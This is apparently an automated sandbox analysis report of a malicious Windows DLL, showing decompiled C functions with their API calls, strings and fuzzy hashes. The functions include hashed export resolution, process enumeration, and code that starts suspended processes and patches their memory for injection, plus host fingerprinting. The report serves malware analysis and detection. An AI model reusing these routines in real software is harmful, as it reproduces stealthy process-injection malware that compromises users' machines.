				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0x1001e684; // 0x164faa0
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0x1001e684; // 0x164faa0
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0x1001e684; // 0x164faa0
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E10012301(E1000D400(_t75, E1000C379(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E100122D3( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E1000902D(1, _t79, 0x14, 0x1e,  &_v2680);
				_t145 = E1000CD33(_t79); // executed
				 *((intOrPtr*)(_t222 + 0x1898)) = _t145;
				return _t222;
			}

APIs

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

GetCurrentProcessId.KERNEL32 ref: 1000D046
GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 1000D082
GetCurrentProcess.KERNEL32 ref: 1000D09F
LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 1000D131
GetLastError.KERNEL32 ref: 1000D13E
GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 1000D16C
GetLastError.KERNEL32 ref: 1000D172
MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 1000D1C7
GetCurrentProcess.KERNEL32 ref: 1000D20E
memset.MSVCRT ref: 1000D229
GetVersionExA.KERNEL32(00000000), ref: 1000D234
GetCurrentProcess.KERNEL32(00000100), ref: 1000D24E
GetSystemInfo.KERNEL32(?), ref: 1000D26A
GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 1000D287

Strings

%s\%s, xrefs: 1000D2F9
USERPROFILE, xrefs: 1000D2E4, 1000D312
TEMP, xrefs: 1000D328, 1000D333, 1000D344
SystemDrive, xrefs: 1000D353, 1000D35E, 1000D373
TEMP, xrefs: 1000D2F3

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CurrentProcess$ErrorFileLastModuleName$AccountAllocByteCharDirectoryHeapInfoLookupMultiSystemVersionWideWindowsmemset
String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
API String ID: 1775177207-2706916422
Opcode ID: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
Instruction ID: b43297c2b7e84521e640d7514395b2e770dddaaf3bf4c430bd1fb4440b0adffa
Opcode Fuzzy Hash: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
Instruction Fuzzy Hash: 7AB14875600709ABE714EB70CC89FEE77E8EF18380F01486EF55AD7195EB70AA448B21

Uniqueness

Uniqueness Score: -1.00%

Function 10005F82, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 104
threadCOMMON

Download Yara Rule

C-Code - Quality: 82%

			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				long _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				void* _t38;
				void* _t49;
				struct _SECURITY_ATTRIBUTES* _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq"); // executed
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E100085EF();
				_t19 = E1000980C( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E10008F78();
					GetModuleHandleA(0);
					_t22 = _a4;
					 *0x1001e69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E100095C7(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E100085C2( &_a8);
							_t53 =  &(_t53->nLength);
						} while (_t53 < 0x2710);
						E10012A5B( *0x1001e69c);
						 *_t55 = 0x7c3;
						 *0x1001e684 = E1000E1BC(0x1001ba28, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E100095E1(0x1001ba28);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32); // executed
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E100085D5();
							_v8 = 0;
							_t38 = CreateThread(0, 0, E10005E06, 0, 0,  &_v8);
							 *0x1001e6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E100085D5();
					}
					goto L10;
				}
			}

APIs

OutputDebugStringA.KERNEL32(Hello qqq), ref: 10005F92
SetLastError.KERNEL32(000000AA), ref: 100060D7

Part of subcall function 100085EF: HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8

Part of subcall function 1000980C: GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
Part of subcall function 1000980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839

GetModuleHandleA.KERNEL32(00000000), ref: 10005FCC
GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 10005FE7
GetLastError.KERNEL32 ref: 10005FEF
memset.MSVCRT ref: 10006013
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 10006035
GetFileAttributesW.KERNEL32(00000000), ref: 10006083
CreateThread.KERNEL32(00000000,00000000,10005E06,00000000,00000000,?), ref: 100060B7

Strings

Hello qqq, xrefs: 10005F8D

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$CreateErrorLastModuleTime$AttributesByteCharDebugHandleHeapMultiNameOutputStringSystemThreadUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
String ID: Hello qqq
API String ID: 3435743081-3610097158
Opcode ID: 4f0bd1883edd1a52277ce24a9e1719a690fb83a9cd489a56b0391a9d10c83903
Instruction ID: 5d240a4b5adc479b0f810b05b199863bf69006de757f0dcc77d76d9ad36975de
Opcode Fuzzy Hash: 4f0bd1883edd1a52277ce24a9e1719a690fb83a9cd489a56b0391a9d10c83903
Instruction Fuzzy Hash: 8C31E574900654ABF754DB30CC89E6F37A9EF893A0F20C229F855C6195DB34EB49CB21

Uniqueness

Uniqueness Score: -1.00%

Function 1000B7A8, Relevance: 9.1, APIs: 6, Instructions: 83
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000B7A8(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				GetComputerNameW( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E100095E1(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E100085D5( &_v16);
				_t33 = E1000C392(_t43);
				E10009640( &(_t43[E1000C392(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E1000C392(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E1000D400(_t43, E1000C392(_t43) + _t40, 0);
			}

APIs

memset.MSVCRT ref: 1000B7C5
GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 1000B7E0
lstrcpynW.KERNEL32(?,?,00000100), ref: 1000B7EF
GetVolumeInformationW.KERNEL32(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000B821

Part of subcall function 10009640: _vsnwprintf.MSVCRT ref: 1000965D

lstrcatW.KERNEL32 ref: 1000B85A
CharUpperBuffW.USER32(?,00000000), ref: 1000B86C

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
String ID:
API String ID: 3410906232-0
Opcode ID: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
Instruction ID: 180e092026911c17520c8b5fa365ce7934641c9957428f094d539ad927535ab9
Opcode Fuzzy Hash: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
Instruction Fuzzy Hash: 9C2171B6900218BFE714DBA4CC8AFAF77BCEB44250F108169F505D6185EA75AF448B60

Uniqueness

Uniqueness Score: -1.00%

Function 1000ABA3, Relevance: 7.6, APIs: 5, Instructions: 65
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000ABA3(intOrPtr __ecx, void* __edx) {
				void* _v304;
				void* _v308;
				signed int _t14;
				signed int _t15;
				void* _t22;
				intOrPtr _t28;
				void* _t31;
				intOrPtr _t33;
				void* _t40;
				void* _t42;

				_t33 = __ecx;
				_t31 = __edx; // executed
				_t14 = CreateToolhelp32Snapshot(2, 0);
				_t42 = _t14;
				_t15 = _t14 | 0xffffffff;
				if(_t42 != _t15) {
					memset( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t42,  &_v304) != 0) {
						while(1) {
							_t22 = E1000CCC0(_t33,  &_v308, _t31); // executed
							_t40 = _t22;
							if(_t40 == 0) {
								break;
							}
							_t33 =  *0x1001e684; // 0x164faa0
							if(Process32Next(_t42,  &_v308) != 0) {
								continue;
							}
							break;
						}
						CloseHandle(_t42);
						_t15 = 0 | _t40 == 0x00000000;
					} else {
						_t28 =  *0x1001e684; // 0x164faa0
						 *((intOrPtr*)(_t28 + 0x30))(_t42);
						_t15 = 0xfffffffe;
					}
				}
				return _t15;
			}

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 1000ABBD
memset.MSVCRT ref: 1000ABD6
Process32First.KERNEL32(00000000,?), ref: 1000ABED
Process32Next.KERNEL32(00000000,?), ref: 1000AC21
CloseHandle.KERNEL32(00000000), ref: 1000AC2E

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32memset
String ID:
API String ID: 1267121359-0
Opcode ID: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
Instruction ID: 824b075522648d78722121d86b555edf1df252a9305654497386a44dc5d3d608
Opcode Fuzzy Hash: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
Instruction Fuzzy Hash: B11191732043556BF710DB68DC89E9F37ECEB863A0F560A29F624CB181EB30D9058762

Uniqueness

Uniqueness Score: -1.00%

Function 1000DFAD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000DFAD(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E1000D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

APIs

LoadLibraryA.KERNEL32(.dll), ref: 1000E07D
GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 1000E089

Strings

.dll, xrefs: 1000E079, 1000E07C

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll
API String ID: 2574300362-2738580789
Opcode ID: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
Instruction ID: 6da95daea6e89431fe10e6910c52a9851ea62cfcad36df982cd2ab94b172e300
Opcode Fuzzy Hash: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
Instruction Fuzzy Hash: F631E431A002998BEB54CFA9C8847AEBBF5EF44384F24446DD905E7349D770ED81C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000CA25, Relevance: 4.6, APIs: 3, Instructions: 120
threadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000CA25(intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v36;
				char _v40;
				char _v80;
				char _t37;
				intOrPtr _t38;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t54;
				intOrPtr _t57;
				long _t61;
				intOrPtr _t62;
				signed int _t65;
				signed int _t68;
				signed int _t82;
				void* _t85;
				char _t86;

				_v8 = _v8 & 0x00000000;
				_v20 = __edx;
				_t65 = 0;
				_t37 = E1000C8FD( &_v8);
				_t86 = _t37;
				_v24 = _t86;
				_t87 = _t86;
				if(_t86 == 0) {
					return _t37;
				}
				_t38 =  *0x1001e688; // 0x15d0590
				E1000A86D( &_v80,  *((intOrPtr*)(_t38 + 0xac)) + 7, _t87);
				_t82 = _v8;
				_t68 = 0;
				_v16 = 0;
				if(_t82 == 0) {
					L20:
					E1000861A( &_v24, 0);
					return _t65;
				}
				while(_t65 == 0) {
					while(_t65 == 0) {
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t45 = E1000AE66( *((intOrPtr*)(_t86 + _t68 * 4)),  &_v40); // executed
						_t92 = _t45;
						if(_t45 >= 0) {
							_t54 = E1000CB77(E10005CEC,  &_v40, _t92, _v20); // executed
							if(_t54 != 0) {
								_t57 =  *0x1001e684; // 0x164faa0
								_t85 =  *((intOrPtr*)(_t57 + 0xc4))(0, 0, 0,  &_v80);
								if(_t85 != 0) {
									GetLastError();
									_t61 = ResumeThread(_v36);
									_t62 =  *0x1001e684; // 0x164faa0
									if(_t61 != 0) {
										_push(0xea60);
										_push(_t85);
										if( *((intOrPtr*)(_t62 + 0x2c))() == 0) {
											_t65 = _t65 + 1;
										}
										_t62 =  *0x1001e684; // 0x164faa0
									}
									CloseHandle(_t85);
								}
							}
						}
						if(_v40 != 0) {
							if(_t65 == 0) {
								_t52 =  *0x1001e684; // 0x164faa0
								 *((intOrPtr*)(_t52 + 0x104))(_v40, _t65);
							}
							_t48 =  *0x1001e684; // 0x164faa0
							 *((intOrPtr*)(_t48 + 0x30))(_v36);
							_t50 =  *0x1001e684; // 0x164faa0
							 *((intOrPtr*)(_t50 + 0x30))(_v40);
						}
						_t68 = _v16;
						_t47 = _v12 + 1;
						_v12 = _t47;
						if(_t47 < 2) {
							continue;
						} else {
							break;
						}
					}
					_t82 = _v8;
					_t68 = _t68 + 1;
					_v16 = _t68;
					if(_t68 < _t82) {
						continue;
					} else {
						break;
					}
					do {
						goto L19;
					} while (_t82 != 0);
					goto L20;
				}
				L19:
				E1000861A(_t86, 0xfffffffe);
				_t86 = _t86 + 4;
				_t82 = _t82 - 1;
			}

APIs

Part of subcall function 1000AE66: memset.MSVCRT ref: 1000AE85
Part of subcall function 1000AE66: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5

Part of subcall function 1000CB77: memset.MSVCRT ref: 1000CBB8
Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
Part of subcall function 1000CB77: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
Part of subcall function 1000CB77: FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73

GetLastError.KERNEL32(?,00000001), ref: 1000CACC
ResumeThread.KERNEL32(?,?,00000001), ref: 1000CADA
CloseHandle.KERNEL32(00000000,?,00000001), ref: 1000CAFD

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: MemoryVirtual$Protectmemset$CloseCreateErrorFreeHandleLastLibraryProcessResumeThreadWrite
String ID:
API String ID: 1274669455-0
Opcode ID: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
Instruction ID: 8d942f140de3fd5d428a133cfbe882c53197cdce90259c44b1bbe97365db357f
Opcode Fuzzy Hash: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
Instruction Fuzzy Hash: AF417E31A00319AFEB01DFA8C985EAE77F9FF58390F124168F501E7265DB30AE058B51

Uniqueness

Uniqueness Score: -1.00%

Function 1000B998, Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E1000B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E10008604(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E1000861A( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}

APIs

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9E9

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$AllocErrorHeapLast
String ID:
API String ID: 4258577378-0
Opcode ID: 25ca12ee674f2655c61ae174559f6c02d40ec3235ed2cc3a33db728961b5c84c
Instruction ID: 0e837ad5d344672522dd0af1a739acbaf95446ba78b21159f473d30cfb6f5d1d
Opcode Fuzzy Hash: 25ca12ee674f2655c61ae174559f6c02d40ec3235ed2cc3a33db728961b5c84c
Instruction Fuzzy Hash: 8E01A27260066ABFAB24DFA6CC89D8F7FECEB456E17120225F605D3124E630DE00C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000AE66, Relevance: 3.0, APIs: 2, Instructions: 46
processCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E1000AE66(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;
				WCHAR* _t15;
				int _t19;
				struct _PROCESS_INFORMATION* _t20;

				_t20 = __edx;
				_t15 = __ecx;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t19 = 0x44;
				memset( &_v72, 0, _t19);
				_v72.cb = _t19;
				_t11 = CreateProcessW(0, _t15, 0, 0, 0, 4, 0, 0,  &_v72, _t20);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}

0x1000ae6f
0x1000ae75
0x1000ae79
0x1000ae7a
0x1000ae7b
0x1000ae7c
0x1000ae80
0x1000ae85
0x1000ae8d
0x1000aea5
0x1000aeab
0x1000aeb3

APIs

memset.MSVCRT ref: 1000AE85
CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateProcessmemset
String ID:
API String ID: 2296119082-0
Opcode ID: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
Instruction ID: 8cd7357356a5339f89587e4f6554bd087a86913dd4092c53185382899a550088
Opcode Fuzzy Hash: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
Instruction Fuzzy Hash: 63F012F26041187FF760D6ADDC46EBB77ACC789654F104532FA05D6190E560ED058161

Uniqueness

Uniqueness Score: -1.00%

Function 1000E1BC, Relevance: 3.0, APIs: 2, Instructions: 35
libraryCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E1000E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E100095C7(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E1000E171(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E100085C2( &_v8);
				return _t25;
			}

0x1000e1bf
0x1000e1c2
0x1000e1c8
0x1000e1ca
0x1000e1cf
0x1000e1d1
0x1000e1db
0x1000e1dc
0x1000e1eb
0x1000e1de
0x1000e1de
0x1000e1de
0x1000e1ef
0x1000e1f6
0x1000e1fc
0x1000e1fc
0x1000e201
0x1000e20c

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1DE
LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1EB

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
Instruction ID: 73ed2ebf8e11191eb6597406948a09e9f6d4d80ef2ff5e7d934a0b04cc0c2bea
Opcode Fuzzy Hash: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
Instruction Fuzzy Hash: 92F08231704254ABE704DB69DC8589EB7EDEB547D1710402AF406E3255DA70DE0087A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000CCC0, Relevance: 2.5, APIs: 2, Instructions: 48
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000CCC0(void* __ecx, intOrPtr _a4, signed int _a8) {
				CHAR* _v8;
				int _t28;
				signed int _t31;
				signed int _t34;
				signed int _t35;
				void* _t38;
				signed int* _t41;

				_t41 = _a8;
				_t31 = 0;
				if(_t41[1] > 0) {
					_t38 = 0;
					do {
						_t3 =  &(_t41[2]); // 0xe6840d8b
						_t34 =  *_t3;
						_t35 = 0;
						_a8 = 0;
						if( *((intOrPtr*)(_t38 + _t34 + 8)) > 0) {
							_v8 = _a4 + 0x24;
							while(1) {
								_t28 = lstrcmpiA(_v8,  *( *((intOrPtr*)(_t38 + _t34 + 0xc)) + _t35 * 4));
								_t14 =  &(_t41[2]); // 0xe6840d8b
								_t34 =  *_t14;
								if(_t28 == 0) {
									break;
								}
								_t35 = _a8 + 1;
								_a8 = _t35;
								if(_t35 <  *((intOrPtr*)(_t34 + _t38 + 8))) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t41 =  *_t41 |  *(_t34 + _t38);
						}
						L8:
						_t31 = _t31 + 1;
						_t38 = _t38 + 0x10;
						_t20 =  &(_t41[1]); // 0x1374ff85
					} while (_t31 <  *_t20);
				}
				Sleep(0xa);
				return 1;
			}

APIs

lstrcmpiA.KERNEL32(?,?,00000128,00000000,?,?,?,1000AC0D,?,?), ref: 1000CCF4
Sleep.KERNEL32(0000000A,00000000,?,?,?,1000AC0D,?,?), ref: 1000CD26

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Sleeplstrcmpi
String ID:
API String ID: 1261054337-0
Opcode ID: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
Instruction ID: cde0d477192250e791ba25b7cb0ca9c4b7eae4faf087914376a22588bee842ac
Opcode Fuzzy Hash: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
Instruction Fuzzy Hash: 21018031600709EFEB10DF69C884D5AB7E5FF843A4725C47AE95A8B215D730E942DB50

Uniqueness

Uniqueness Score: -1.00%

Function 10005E96, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10005E96() {
				intOrPtr _t3;

				_t3 =  *0x1001e684; // 0x164faa0
				 *((intOrPtr*)(_t3 + 0x2c))( *0x1001e6a8, 0xffffffff);
				ExitProcess(0);
			}

0x10005e96
0x10005ea3
0x10005ead

APIs

ExitProcess.KERNEL32(00000000), ref: 10005EAD

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
